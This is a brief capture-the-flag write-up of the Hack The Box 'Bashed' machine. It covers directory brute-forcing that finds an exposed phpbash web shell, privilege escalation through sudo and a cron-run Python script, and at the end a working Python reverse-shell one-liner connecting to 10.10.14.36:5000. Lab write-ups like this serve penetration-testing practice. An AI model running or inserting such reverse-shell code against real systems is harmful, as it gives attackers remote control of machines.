Bashed box on Hack the Box Write up
by Jean-Michel Frouin
General Infos
- OS: Linux
- Difficulty: Easy
- Points: 20
- Release: 09 Dec 2017
- IP: 10.10.10.68
Enumeration
Ports
-
80/tcp open tcpwrapped
- Apache httpd 2.4.18 (Ubuntu)
Web
-
dirbuster
jm@kali:~$ dirbuster Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / - 200 File found: /index.html - 200 File found: /single.html - 200 Dir found: /js/ - 200 File found: /js/jquery.js - 200 File found: /js/imagesloaded.pkgd.js - 200 File found: /js/jquery.nicescroll.min.js - 200 File found: /js/jquery.smartmenus.min.js - 200 File found: /js/jquery.carouFredSel-6.0.0-packed.js - 200 File found: /js/jquery.mousewheel.min.js - 200 File found: /js/jquery.touchSwipe.min.js - 200 Dir found: /demo-images/ - 200 File found: /js/jquery.easing.1.3.js - 200 File found: /js/main.js - 200 File found: /js/custom_google_map_style.js - 200 File found: /js/html5.js - 200 Dir found: /icons/ - 403 File found: /config.php - 200 Dir found: /css/ - 200 Dir found: /images/ - 200 Dir found: /dev/ - 200 File found: /css/carouFredSel.css - 200 File found: /css/clear.css - 200 File found: /css/common.css - 200 File found: /dev/phpbash.min.php - 200 File found: /css/font-awesome.min.css - 200 File found: /css/sm-clean.css - 200 File found: /dev/phpbash.php - 200 Dir found: /php/ - 200 File found: /php/sendMail.php - 200 Dir found: /uploads/ - 200 Dir found: /icons/small/ - 403
- /dev/phpbash.php
- /php
- /php/sendmail.php
- /dev/phpbash.min.php
Exploitation
Using phpbash.php
User Flag
/home/arrexel/user.txt
Priv Esc
sudo -l
sudo -u scriptmanager bash
discover /script
test.txt created by test.py using cron each minute
Reverse Shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.36”,5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’